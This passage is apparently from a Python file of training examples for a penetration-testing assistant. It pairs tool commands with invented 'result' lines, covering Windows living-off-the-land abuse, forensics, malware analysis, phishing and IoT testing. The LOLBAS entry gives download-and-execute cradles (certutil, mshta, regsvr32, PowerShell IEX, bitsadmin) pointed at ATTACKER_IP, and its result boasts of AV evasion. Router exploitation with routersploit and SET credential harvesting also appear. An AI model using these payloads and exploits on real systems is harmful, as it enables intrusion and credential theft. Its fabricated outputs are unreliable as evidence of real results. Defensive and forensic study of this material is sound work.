       ["identify lolbas technique", "download payload", "execute payload"],
       ["# Download dengan certutil",
        "certutil -urlcache -split -f http://ATTACKER_IP/payload.exe payload.exe",
        "# Execute HTA dengan mshta",
        "mshta http://ATTACKER_IP/payload.hta",
        "# Load DLL dengan regsvr32",
        "regsvr32 /s /n /u /i:http://ATTACKER_IP/payload.sct scrobj.dll",
        "# PowerShell download cradle",
        "powershell -c \"IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')\"",
        "# BITSAdmin download",
        "bitsadmin /transfer job http://ATTACKER_IP/file.exe C:\\Windows\\Temp\\file.exe"],
       [("certutil", "file download LOLBAS"),
        ("mshta", "HTA execution LOLBAS"),
        ("regsvr32", "DLL/SCT execution LOLBAS")],
       "LOLBAS efektif karena signed binaries trusted oleh AV dan application whitelisting",
       "LOLBAS tools: certutil, mshta, regsvr32, bitsadmin, rundll32, wmic — semua built-in Windows",
       "professional",
       "LOLBAS: certutil download berhasil. mshta execution triggered callback. AV tidak detect."),
]

# ─── 12. FORENSICS ───────────────────────────────────────────────────────────
FORENSICS6 = [
    _e("Memory forensics dengan volatility3",
       ["volatility3 adalah framework memory forensics yang digunakan via vol.py atau vol3",
        "BUKAN dengan flags vmlinux atau imagefile.vmdk — itu salah!",
        "syntax bener: python3 vol.py -f memory.dmp PLUGIN",
        "plugins: windows.pslist, windows.netscan, windows.malfind, linux.pslist"],
       ["identify OS profile", "list processes", "check network connections", "detect injected code"],
       ["python3 vol.py -f memory.dmp windows.info",
        "python3 vol.py -f memory.dmp windows.pslist",
        "python3 vol.py -f memory.dmp windows.pstree",
        "python3 vol.py -f memory.dmp windows.netscan",
        "python3 vol.py -f memory.dmp windows.malfind",
        "python3 vol.py -f memory.dmp windows.cmdline",
        "python3 vol.py -f memory.dmp windows.filescan | grep -i '.exe'",
        "python3 vol.py -f memory.dmp linux.pslist"],
       [("volatility3", "memory forensics framework")],
       "volatility3 syntax: vol.py -f MEMORY_FILE PLUGIN — tanpa profile di v3 (auto-detect)",
       "volatility3 plugins: windows.pslist, windows.netscan, windows.malfind, windows.dumpfiles",
       "professional",
       "volatility3: 87 processes. Suspicious: svchost.exe injected code (malfind). C2 connection ke 185.x.x.x"),

    _e("Disk forensics dengan autopsy dan sleuthkit",
       ["Autopsy GUI forensics platform berbasis The Sleuth Kit",
        "sleuthkit command line: fls, icat, fsstat untuk disk analysis",
        "mmls untuk partition table, fls untuk file listing"],
       ["identify partition structure", "list files", "recover deleted files", "extract artifacts"],
       ["mmls disk.img",
        "fsstat -o 2048 disk.img",
        "fls -o 2048 -r disk.img | grep -i 'deleted'",
        "fls -o 2048 disk.img > file_list.txt",
        "icat -o 2048 disk.img INODE_NUMBER > recovered_file",
        "# Extract specific file by path",
        "fls -o 2048 -r disk.img | grep 'filename.txt'",
        "icat -o 2048 disk.img $(fls -o 2048 disk.img | grep 'filename.txt' | awk '{print $2}' | tr -d ':') > extracted.txt"],
       [("autopsy", "GUI disk forensics platform"),
        ("sleuthkit", "command-line disk forensics toolkit")],
       "mmls dulu untuk cari offset partisi, gunakan offset itu di semua command berikutnya",
       "sleuthkit: mmls (partitions), fsstat (filesystem info), fls (file list), icat (extract file)",
       "analytical",
       "sleuthkit: 3 deleted files recovered. Browser history, chat logs, encrypted archive found."),

    _e("Windows Event Log analysis untuk threat hunting",
       ["Windows Event Logs menyimpan aktivitas sistem, login, proses",
        "chainsaw untuk fast event log analysis dengan Sigma rules",
        "hayabusa untuk threat hunting di EVTX files",
        "event IDs penting: 4624 (logon), 4625 (failed), 4688 (process), 4698 (scheduled task)"],
       ["collect event logs", "analyze dengan chainsaw", "threat hunt dengan hayabusa"],
       ["# Collect logs dari Windows",
        "wevtutil epl Security C:\\evidence\\Security.evtx",
        "wevtutil epl System C:\\evidence\\System.evtx",
        "# Chainsaw analysis",
        "chainsaw hunt /path/to/evtx/ -s sigma_rules/ --mapping mappings/sigma-event-logs-all.yml -o chainsaw_results.csv",
        "chainsaw search -t 'Event.System.EventID: 4625' /path/to/Security.evtx",
        "# Hayabusa",
        "hayabusa csv-timeline -f Security.evtx -o timeline.csv",
        "hayabusa summary -f Security.evtx"],
       [("chainsaw", "fast EVTX analysis dengan Sigma rules"),
        ("hayabusa", "Windows event log threat hunting")],
       "chainsaw -s sigma rules folder, hayabusa untuk timeline lengkap semua event",
       "Event IDs: 4624=logon, 4625=failed logon, 4688=process create, 4698=scheduled task create",
       "analytical",
       "chainsaw: 23 Sigma rule hits. 4625 failed logon spike (brute force). 4698 suspicious scheduled task."),
]

# ─── 13. MALWARE ─────────────────────────────────────────────────────────────
MALWARE6 = [
    _e("Static malware analysis dengan strings, binwalk, dan pestudio",
       ["static analysis tanpa execute malware — aman untuk analysis awal",
        "strings untuk ekstrak readable strings dari binary",
        "binwalk untuk detect embedded files dan firmware",
        "file dan exiftool untuk metadata"],
       ["check file type", "extract strings", "binwalk analysis", "PE analysis"],
       ["file malware_sample.exe",
        "md5sum malware_sample.exe && sha256sum malware_sample.exe",
        "strings malware_sample.exe | grep -iE 'http|ftp|cmd|powershell|reg'",
        "strings -n 8 malware_sample.exe > strings_out.txt",
        "binwalk malware_sample.exe",
        "binwalk -e malware_sample.exe",
        "exiftool malware_sample.exe",
        "objdump -d malware_sample.exe | head -100"],
       [("strings", "extract printable strings dari binary"),
        ("binwalk", "detect dan extract embedded files"),
        ("file", "identify file type"),
        ("exiftool", "extract metadata")],
       "strings -n 8 untuk filter strings minimal 8 chars (kurangi noise)",
       "static analysis: file → hash → strings → binwalk → PE headers → imports/exports",
       "analytical",
       "strings: C2 URL http://evil.com/c2, mutex 'GlobaL\\MalwareXYZ', registry key persistence found."),

    _e("Dynamic malware analysis dengan sandboxing",
       ["dynamic analysis dengan execute malware di isolated environment",
        "cuckoo sandbox atau cape sandbox untuk automated analysis",
        "monitor: network, filesystem, registry, process behavior"],
       ["setup sandbox", "submit sample", "analyze report"],
       ["# Cuckoo sandbox submission",
        "cuckoo submit malware_sample.exe",
        "cuckoo submit --timeout 120 malware_sample.exe",
        "# CAPE sandbox",
        "python3 utils/submit.py malware_sample.exe",
        "# Via API",
        "curl -F file=@malware_sample.exe http://localhost:8000/tasks/create/file/",
        "# Check results",
        "curl http://localhost:8000/tasks/report/1/",
        "# Any.run atau VirusTotal (online sandbox)",
        "curl -X POST 'https://www.virustotal.com/api/v3/files' -H 'x-apikey: API_KEY' -F 'file=@sample.exe'"],
       [("cuckoo", "automated malware sandbox"),
        ("cape", "advanced malware analysis sandbox")],
       "timeout 120 detik cukup untuk capture behavior malware pada fase initial execution",
       "sandbox output: network IOCs (C2 IPs, domains), file drops, registry persistence, process tree",
       "analytical",
       "Sandbox: C2 beacon ke 45.x.x.x:443. Files dropped: svchost32.exe, registry persistence HKCU\\Run."),
]

# ─── 14. SOCIAL ──────────────────────────────────────────────────────────────
SOCIAL6 = [
    _e("Phishing campaign simulation dengan gophish",
       ["GoPhish open-source phishing framework untuk authorized security awareness testing",
        "buat landing page, email template, tracking pixel",
        "report: open rate, click rate, credential submission rate"],
       ["setup gophish", "buat campaign", "launch dan monitor", "compile report"],
       ["# Start gophish",
        "./gophish",
        "# Access admin: https://localhost:3333",
        "# Default creds: admin/gophish (ganti segera!)",
        "# Via API",
        "curl -k -X GET 'https://localhost:3333/api/campaigns/' -H 'Authorization: API_KEY'",
        "curl -k -X POST 'https://localhost:3333/api/campaigns/' -H 'Content-Type: application/json' -d @campaign.json",
        "# Get results",
        "curl -k 'https://localhost:3333/api/campaigns/1/results' -H 'Authorization: API_KEY'"],
       [("gophish", "phishing simulation framework untuk security awareness testing")],
       "gophish harus di isolated server, bukan production. Selalu dapat izin tertulis sebelum campaign",
       "gophish workflow: SMTP setup → landing page → email template → target list → campaign → report",
       "professional",
       "GoPhish campaign: 50 targets. Open rate: 68%, Click rate: 34%, Credentials submitted: 12 (24%)."),

    _e("Social engineering assessment dengan SET (Social Engineering Toolkit)",
       ["SET untuk automated social engineering attacks dalam authorized assessment",
        "phishing, spear phishing, payload generation",
        "selalu dalam scope authorized pentest"],
       ["launch SET", "pilih attack vector", "configure dan launch"],
       ["setoolkit",
        "# Menu navigation:",
        "# 1) Social-Engineering Attacks",
        "# 2) Website Attack Vectors",
        "# 3) Credential Harvester Attack Method",
        "# 2) Site Cloner",
        "# Input: target site URL untuk clone",
        "# SET auto-start web server di port 80",
        "# Spear phishing:",
        "# SET > 1 > 1 > Spear-Phishing Attack Vectors",
        "python3 setoolkit"],
       [("setoolkit", "Social Engineering Toolkit untuk authorized SE assessment")],
       "SET credential harvester clone website target, capture credentials yang diinput korban",
       "SET: 1=SE Attacks, 2=Website Attacks, 3=Credential Harvester, 2=Site Cloner",
       "professional",
       "SET: credential harvester active. Site cloned. 3 credentials captured dalam 30 menit assessment."),
]

# ─── 15. IOT ─────────────────────────────────────────────────────────────────
IOT6 = [
    _e("Firmware analysis dengan binwalk dan EMBA",
       ["binwalk untuk extract dan analyze firmware binary",
        "EMBA (Embedded Analyzer) untuk comprehensive firmware security analysis",
        "cari: hardcoded credentials, backdoors, vulnerable services, old libraries"],
       ["extract firmware", "analyze filesystem", "check for vulnerabilities"],
       ["binwalk firmware.bin",
        "binwalk -e firmware.bin",
        "binwalk -Me firmware.bin",
        "ls _firmware.bin.extracted/",
        "find _firmware.bin.extracted/ -name 'passwd' -o -name 'shadow' 2>/dev/null",
        "find _firmware.bin.extracted/ -type f -name '*.conf' | xargs grep -l 'password' 2>/dev/null",
        "strings firmware.bin | grep -iE 'admin|password|backdoor|telnet'",
        "emba -f firmware.bin -l emba_output/ -s"],
       [("binwalk", "firmware extraction dan analysis"),
        ("emba", "comprehensive embedded/IoT firmware security analysis")],
       "binwalk -Me untuk recursive extraction (-M) dan matryoshka (-e) nested archives",
       "binwalk -e extract, -M recursive, -Me keduanya. EMBA: -f firmware, -l log dir, -s silent",
       "professional",
       "binwalk: squashfs extracted. Hardcoded: admin:admin123, root:toor. Telnetd enabled by default."),

    _e("IoT device network scanning dan exploit dengan routersploit",
       ["routersploit framework untuk router dan IoT device exploitation",
        "scan untuk detect vulnerable devices di network",
        "exploit default credentials, command injection, path traversal"],
       ["scan network untuk IoT devices", "identify device", "run routersploit autopwn"],
       ["# Scan IoT devices dengan nmap",
        "nmap -sV -p 23,80,443,8080,8443,554,1883,5683 192.168.1.0/24 -oN iot_scan.txt",
        "# Routersploit",
        "python3 rsf.py",
        "rsf > use scanners/autopwn",
        "rsf (scanners/autopwn) > set target 192.168.1.1",
        "rsf (scanners/autopwn) > run",
        "rsf > use exploits/routers/cisco/cisco_rv320_rce",
        "rsf > set target 192.168.1.1",
        "rsf > check",
        "rsf > run"],
       [("nmap", "IoT device discovery dan service detection"),
        ("routersploit", "IoT dan router exploitation framework")],
       "routersploit autopwn mencoba semua exploit yang cocok secara otomatis ke target",
       "routersploit: use scanners/autopwn → set target → run untuk automated IoT exploitation",
       "professional",
       "routersploit: Cisco RV320 vulnerable. RCE confirmed. Command injection as root achieved."),

    _e("MQTT protocol security testing",
       ["MQTT adalah IoT messaging protocol, sering tidak ada authentication",
        "mosquitto_sub/pub untuk subscribe dan publish ke MQTT broker",
        "mqtt-pwn untuk automated MQTT security testing"],
       ["discover MQTT broker", "subscribe ke semua topics", "publish test payload"],
       ["nmap -p 1883,8883 192.168.1.0/24 --open",
        "mosquitto_sub -h target_ip -t '#' -v",
        "mosquitto_sub -h target_ip -p 1883 -t '#' -v --id nexus-test",
        "mosquitto_pub -h target_ip -t 'home/lights/control' -m 'OFF'",
        "mosquitto_pub -h target_ip -t 'device/command' -m '{\"cmd\":\"reset\"}'",
        "# MQTT broker info",
        "mosquitto_sub -h target_ip -t '$SYS/#' -v"],
       [("mosquitto_sub", "subscribe ke MQTT topics"),
        ("mosquitto_pub", "publish pesan ke MQTT broker")],
       "topic '#' adalah wildcard subscribe ALL topics — sering expose semua data IoT",
       "MQTT: port 1883 (plaintext), 8883 (TLS). '#' wildcard semua topics, '+' single level",
       "analytical",
       "MQTT broker unauthenticated. Topics: home/sensors/+, device/command. Plaintext sensor data exposed."),
]

# ── Combined ──────────────────────────────────────────────────────────────────
EXTRA_DATA_2 = (
    RECON6 + SCAN6 + WEB6 + EXPLOIT6 + POST6 +
    BRUTE6 + WIRELESS6 + CLOUD6 + CRYPTO6 +
    DEFENSE6 + EVASION6 + FORENSICS6 + MALWARE6 +
    SOCIAL6 + IOT6
)
